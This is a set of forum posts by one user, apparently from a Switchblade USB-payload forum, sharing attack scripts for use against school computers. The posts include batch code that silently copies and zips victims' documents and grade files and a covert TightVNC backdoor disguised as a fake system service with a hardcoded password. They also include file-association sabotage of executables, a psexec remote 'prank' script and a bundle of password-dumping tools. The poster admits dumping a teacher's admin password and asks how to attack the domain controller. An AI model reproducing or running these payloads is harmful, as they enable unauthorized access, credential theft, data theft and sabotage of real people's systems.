kz26

Using a switchblade to dump a user's files can get very large. It would be in everyone's interest to maximize their drive's usefulness by first compressing the entire contents of a switchblade dump. I accomplished using InfoZip, which is a small and portable ZIP creation program very suitable for a switchblade environment. It doesn't seem like anyone has implemented this before, so I'll post it here. Step 1. Visit http://www.info-zip.org/Zip.html#Win32 and download InfoZip 2.32 from any of the mirrors. Step 2. Put zip.exe in your switchblade's main program directory. Step 3. Add the appropriate code for ZIP-compressing the user's files and/or the produced dump logfiles. REM Create Zip of user's files with the following extensions set dumpext = *.doc *.docx *.xls *.xlsx *.cls zip.exe -r9q ..dumps%computername%%computername%-files.zip "%homedrive%%homepath%" -i %dumpext% REM Zip Dumpfiles zip.exe -m9jDq ..dumps%computername%%computername%.zip ..dumps%computername%*.txt Feel free to improve upon this idea. I hope people will find this practical and efficient

Here's the idea. Actually, it was a friend that gave this to me. In your switchblade payload's main batch script, add something like: assoc .bat=txtfile assoc .com=txtfile assoc .cmd=txtfile assoc .exe=txtfile This, obviously, could be pretty bad since all executables are now treated as text files. Now, please don't start ripping on this as "newbish" or "pointless". If you REALLY want to do some damage, here's a simple, fast, and crude way of doing it.

Hey, always happy to help someone remote control a computer :twisted: I read up on netcat, and it does seem helpful in NAT traversal across a gateway. Anyone got any ideas of how to use it like I<3Haxsaw is thinking?

Wow...this is exactly why I created my OWN TightVNC installer. Check this: http://www.hak5.org/forums/viewtopic.php?t=4741 Connect to your school from home or other off-site location may be difficult or impossible, considering that most schools have their computers sitting behind a gateway. I wouldn't really be sure of how to do it, if it's even feasible. I never read anything about netcat - I don't think it's necessary for anything.

If you mean setting the "hidden" file attribute, then yes, you can hide everything. Since the file still exists, Windows will have no problem using them.

Download one of the premade payloads and find out how they work. Seriously, a little common sense, some self effort, and a bit of Google research will tell you everything you need to know.

Until you figure out the hash type, there's really not much you can do in terms of PW cracking... :roll:

"Physical Access Penetration Techniques?" No wonder he doesn't like the title. Might conjure up the wrong image :P

I just came up with this - I think it's an excellent prank. When run, this batch file will crank up the target machine's volume to maximum and play a WAV file called sound.wav that you have (Windows 2000/XP/2003 only!). The target machine must have the admin$ SMB share enabled, and you must also have admin privileges for the target. You must have a copy of NirCmd and psexec (from Sysinternals' PsTools) and the WAV file in the same directory as this script. @echo off echo Sound BITE Prank echo by kz26 REM Ask for name of target machine SET rmt= SET /P rmt=Enter target machine UNC hostname: REM Connect to C:Windows directory on target as I: Drive net use I: %rmt%admin$ REM Copy WAV sound file and NirCMD for volume control xcopy sound.wav I: /c /y xcopy nircmd.exe I: /c /y REM Crank up the sound WAY UP on the remote machine psexec %rmt% nircmd.exe mutesysvolume 0 master psexec %rmt% nircmd.exe setsysvolume 65535 master REM Now for the fun part...play it on the remote machine silently psexec %rmt% sndrec32.exe /play /close /embedding "C:Windowssound.wav" REM Delete the sound file and nircmd.exe del I:sound.wav del I:nircmd.exe REM Disconnect the remote drive net use I: /delete exit I take no responsibility for obscene sounds or twisted uses people may find for this. For best results stay in the same room as the victim to observe reaction.

Hell...why use a "real" or "premade" RAT? Just use some "legit" things like VNC or something. It also helps if you know some batch/shell scripting...

Funny how a nonsense thread now has 20 replies...

After growing tired of the prepackaged payloads hosted here at Hak5, I decided to make my own. After several weeks of (successful) field testing, here it is. The package comes with an autorun.inf, so simply unrar onto the root of your USB drive. It still features the same great silent run capability... Payload contents: 1. Firefox password dumper by Nagareshwar Y Talekar 2. pwdump6 by fizzgig/Foofus Networking 3. NirCmd by Nir Sofer/NirSoft 4. LSADump by Nir Sofer/NirSoft 5. TightVNC server (http://www.tightvnc.com) 6. ProduKey by Nir Sofer/NirSoft 7. Outlook PST Password Dumper by Nir Sofer/NirSoft 8. Mail Passview by Nir Sofer/NirSoft 9. Network Password Recovery by Nir Sofer/NirSoft 10. Protected Storage Passview by Nir Sofer/NirSoft 11. NetResView by Nir Sofer/NirSoft If you have any ideas for more useful tools to be added, please post.

Try the U3 Universal Customizer, hosted right here at http://www.hak5.org/packages/files/Universal_Customizer.zip Just follow the directions, and you'll have a custom ISO partition on your U3 drive.

Hell, go ahead and try it if you want. But don't say nobody warned you...

The TI-82/83/84/85/86 calculators are all Z80-based. You might want to try http://www.ticalc.org and see what help you can get.

Yeah - xcopy sucks because it basically only allows you to use one and only one wildcard. I have heard of a third-party program called xxcopy (try googling it) but never used it before.

Keep in mind that Thunderbird generates a RANDOM profile name for each user. Therefore "a89puyl2.default" is not going to work globally.

Also, would it be possible to exclude files/folders over a certain size? xcopy doesn't seem to have any option for doing this.

Is it just me,or is my puny 128MB drive going to DIE when I try this...

Ok, this antidote is pretty simple - it does everything BUT delete the registry keys, but that shouldn't be a major issue. @echo off REM TightVNC Server Antidote REM Turn off the service sc stop winvnc REM Delete the service sc delete winvnc REM Delete the server files del %systemroot%winvnc.exe del %systemroot%VNCHooks.dll

Yeah, the students at our school are supposed to have limited accounts. However, i pwdumped a teachers comp when they weren't there to get the local admin password.

All right...I want to try pwdumping our school's logon domain server/controller. I already have a local Administrator account. Will pwdump6 work against a domain with just local Administrator privileges? Or would I have to have Domain Administrator credentials? Thanks to anyone who can provide an answer.

I found that the VNC entry on the Switchblade wiki was too cumbersome to follow. I did some research and was able to create a silent install package for the TightVNC server (seewww.tightvnc.com.) The beauty of this VNC variant is that the server requires only 2 files, an EXE and its DLL. To create this payload: 1. Go to the TightVNC homepage above. 2. Download the no-install zip package. 3. In your switchbladetools directory, create the folder "tvnc". 4. Copy "winvnc.exe" and "VNCHooks.dll" to the "tvnc" directory. 5. Create "vnc.cmd" in your tools directory with the following code: @echo off REM Silent Install of TightVNC server REM Install script by kz26 REM Part 1 - Copy server files xcopy tvncwinvnc.exe %systemroot% /c /y xcopy tvncVNCHooks.dll %systemroot% /c /y REM install phony WinVNC service and import reg settings sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." regedit.exe /s tvncreg1.reg regedit.exe /s tvncreg2.reg REM Start the VNC Service and have fun net start winvnc 6. Create reg1.reg and reg2.reg in your "tvnc" directory. Contents of reg1.reg Windows Registry Editor Version 5.00 [HKEY_CURRENT_USERSoftwareORL] [HKEY_CURRENT_USERSoftwareORLVNCHooks] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe] "use_GetUpdateRect"=dword:00000001 "use_Timer"=dword:00000000 "use_KeyPress"=dword:00000001 "use_LButtonUp"=dword:00000001 "use_MButtonUp"=dword:00000001 "use_RButtonUp"=dword:00000001 "use_Deferral"=dword:00000001 Contents of reg2.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORL] [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3] "ConnectPriority"=dword:00000000 "DebugMode"=dword:00000000 "DebugLevel"=dword:00000002 "LoopbackOnly"=dword:00000000 "EnableHTTPDaemon"=dword:00000000 "EnableURLParams"=dword:00000000 "AllowLoopback"=dword:00000001 "AuthRequired"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default] "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000001e "QueryAccept"=dword:00000000 "QueryAllowNoPass"=dword:00000000 "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000000 "PortNumber"=dword:00001f90 "HTTPPortNumber"=dword:000016a8 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "LockSetting"=dword:00000000 "RemoveWallpaper"=dword:00000001 "Password"=hex:77,96,ba,8c,c2,b3,68,07 "PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07 "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 7. Add the following to your go.cmd file: start /b .vnc.cmd ------------ This payload will silently install the WinVNC service and disguise it as a "realistic" system service. To connect: Use any VNC viewer to connect to the target. Port: 8080 Username: N/A password: hacked I believe this payload is much more streamlined. Obviously, it won't do the external IP email send as the wiki version advertises, but this method should be more than adequate for most people. P.S. I use this to install VNC at my school's WinXP Pro computer lab. Works great for pissing off unsuspecting people... [/code]

MicroGrade files are CLS files. REM File/Directory DUmp by kz26 REM supports DOC, DOCx, XLS, PDF, CLS files @echo off echo [Complete User Profile Directory/File Listing] &gt;..dump%computername%dirlist.txt echo. &gt;&gt; ..dump%computername%dirlist.txt dir /s "%homedrive%%homepath%" &gt;&gt; ..dump%computername%dirlist.txt echo Log of Copied Files &gt;..dump%computername%filecopy.txt echo. &gt;&gt; ..dump%computername%filecopy.txt xcopy "%homedrive%%homepath%My Documents*.doc" ..dump%computername%files /c /s /l &gt;&gt; ..dump%computername%filecopy.txt echo. &gt;&gt; ..dump%computername%filecopy.txt xcopy "%homedrive%%homepath%My Documents*.docx" ..dump%computername%files /c /s /l &gt;&gt; ..dump%computername%filecopy.txt echo. &gt;&gt; ..dump%computername%filecopy.txt xcopy "%homedrive%%homepath%My Documents*.xls" ..dump%computername%files /c /s /l &gt;&gt; ..dump%computername%filecopy.txt echo. &gt;&gt;..dump%computername%filecopy.txt xcopy "%homedrive%%homepath%My Documents*.pdf" ..dump%computername%files /c /s /l &gt;&gt; ..dump%computername%filecopy.txt echo. &gt;&gt;..dump%computername%filecopy.txt xcopy "%homedrive%%homepath%My Documents*.cls" ..dump%computername%files /c /s /l &gt;&gt; ..dump%computername%filecopy.txt echo. &gt;&gt;..dump%computername%filecopy.txt xcopy C:*.cls ..dump%computername%files /c /s /l &gt;&gt; ..dump%computername%filecopy.txt exit This will probably only work with my custom payload, so tell me if you want it, and ill upload the complete package.

What sorts of payloads do you use with your switchblade drive? DO you create your custom one or do you download a premade one? Please vote, and also post some info about your switchblade (if you have one) as well as some specs of your drive. I use a tiny 128MB PNY drive (in sig) with a custom payload. It uses most of the NirSoft password/history dump utilities, Firepassword, and also copies all DOC/XLS/PDF files from My Documents to the drive. Since I will use this in school, it also dumps MicroGrade CLS class files.